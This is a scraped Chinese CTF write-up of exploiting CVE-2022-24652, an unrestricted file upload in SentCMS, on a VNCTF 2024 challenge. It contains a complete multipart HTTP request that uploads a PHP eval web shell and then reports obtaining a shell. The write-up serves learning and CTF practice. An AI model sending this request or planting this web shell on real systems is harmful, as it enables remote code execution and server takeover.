国产亚洲精品福利在线无卡一,国产精久久一区二区三区,亚洲精品无码国模,精品久久久久久无码专区不卡

當(dāng)前位置: 首頁 > news >正文

網(wǎng)站設(shè)為主頁功能怎么做下載谷歌瀏覽器并安裝

news 2025/7/7 1:14:37
網(wǎng)站設(shè)為主頁功能怎么做,下載谷歌瀏覽器并安裝,ubuntu wordpress安裝,ios開發(fā)CVE-2022-24652 開題 后臺管理是thinkphp的,但是工具沒檢測出漏洞。 登陸后界面如下,上傳頭像功能值得引起注意 這其實(shí)就是CVE-2022-24652,危險類型文件的不加限制上傳,是文件上傳漏洞。漏洞路由/user/upload/upload 參考文章&a…

CVE-2022-24652

開題

image-20240217160907617

后臺管理是thinkphp的,但是工具沒檢測出漏洞。

image-20240217160935703

登陸后界面如下,上傳頭像功能值得引起注意

image-20240217162423183

這其實(shí)就是CVE-2022-24652,危險類型文件的不加限制上傳,是文件上傳漏洞。漏洞路由/user/upload/upload

參考文章:

阿里云漏洞庫 (aliyun.com)

CVE-2022-24652|sentcms 4.0.x allows remote… - VULHUB開源網(wǎng)絡(luò)安全威脅庫

Sentcms任意文件上傳漏洞 | Hanayuzu’Blog

image-20240217163203276

抓包上傳文件,由于沒有上傳文件按鈕,我們手動構(gòu)建上傳包。

修改包:

POST /user/upload/upload HTTP/1.1
Host: 7dd1d89b-bc28-43fc-9b42-a014dff41eea.vnctf2024.manqiu.top
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=bdd5af1e5c92e47342e53886cecaced2
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryrhx2kYAMYDqoTThz
Content-Length: 770------WebKitFormBoundaryrhx2kYAMYDqoTThz
Content-Disposition: form-data; name="id"WU_FILE_0
------WebKitFormBoundaryrhx2kYAMYDqoTThz
Content-Disposition: form-data; name="name"test.jpg
------WebKitFormBoundaryrhx2kYAMYDqoTThz
Content-Disposition: form-data; name="type"image/jpeg
------WebKitFormBoundaryrhx2kYAMYDqoTThz
Content-Disposition: form-data; name="lastModifiedDate"Wed Jul 21 2021 18:15:25 GMT+0800 (中國標(biāo)準(zhǔn)時間)
------WebKitFormBoundaryrhx2kYAMYDqoTThz
Content-Disposition: form-data; name="size"164264
------WebKitFormBoundaryrhx2kYAMYDqoTThz
Content-Disposition: form-data; name="file"; filename="shell.php"
Content-Type: image/jpegJay17
<?php eval($_POST[1]);?>------WebKitFormBoundaryrhx2kYAMYDqoTThz--

image-20240217163823624

訪問呢惡意文件,getshell

image-20240217164029557

http://m.aloenet.com.cn/news/44279.html

相關(guān)文章:

  • 網(wǎng)絡(luò)規(guī)劃的內(nèi)容廣東網(wǎng)站營銷seo費(fèi)用
  • 惠州建設(shè)網(wǎng)站搜索引擎營銷案例分析
  • wordpress 關(guān)閉自動保存功能seo自動排名軟件
  • 浙江高端網(wǎng)站熱點(diǎn)新聞
  • 設(shè)計公司 網(wǎng)站個人網(wǎng)頁設(shè)計作品模板
  • 公司做影視網(wǎng)站侵權(quán)全國疫情防控最新數(shù)據(jù)
  • 網(wǎng)站系統(tǒng)與網(wǎng)站源碼的關(guān)系上海今天發(fā)生的重大新聞
  • 湖南衡陽網(wǎng)站建設(shè)開發(fā)網(wǎng)站的流程是
  • 湖北華亞建設(shè)工程有限公司網(wǎng)站超級優(yōu)化
  • 蘇州市相城區(qū)住房和城鄉(xiāng)建設(shè)局網(wǎng)站網(wǎng)絡(luò)媒體推廣方案
  • 鄭州網(wǎng)站制作怎么樣江蘇seo平臺
  • app界面模板免費(fèi)下載百度網(wǎng)站排名優(yōu)化
  • 網(wǎng)上發(fā)布信息的網(wǎng)站怎么做的百度廣告競價
  • 提供佛山順德網(wǎng)站建設(shè)網(wǎng)站seo優(yōu)化軟件
  • 專業(yè)廣州網(wǎng)站建設(shè)臨沂網(wǎng)站建設(shè)方案服務(wù)
  • 做網(wǎng)站必須要購買空間嗎谷歌瀏覽器 免費(fèi)下載
  • 網(wǎng)頁編輯軟件中文版seo英文全稱
  • 外貿(mào)怎么做網(wǎng)站外鏈seo網(wǎng)站結(jié)構(gòu)優(yōu)化的方法
  • 做調(diào)查賺錢網(wǎng)站有哪些網(wǎng)站推廣
  • 怎么讓網(wǎng)站能被百度到互聯(lián)網(wǎng)營銷師考試
  • 網(wǎng)站建設(shè)經(jīng)驗分享google adsense
  • 搜狗新聞源網(wǎng)站怎么做云南seo公司
  • 江寧網(wǎng)站建設(shè)要多少錢新聞小學(xué)生摘抄
  • wordpress 圖片在哪威海百度seo
  • 如何用魔方網(wǎng)表做門戶網(wǎng)站真正免費(fèi)的建站
  • 網(wǎng)站怎么做圖片網(wǎng)絡(luò)營銷的特征和功能
  • 吉安網(wǎng)站設(shè)計杭州百度優(yōu)化
  • 濟(jì)南集團(tuán)網(wǎng)站建設(shè)公司百度快照如何優(yōu)化
  • 制作英文網(wǎng)站費(fèi)用營銷策略分析
  • 寺院網(wǎng)站建設(shè)谷歌網(wǎng)站收錄提交入口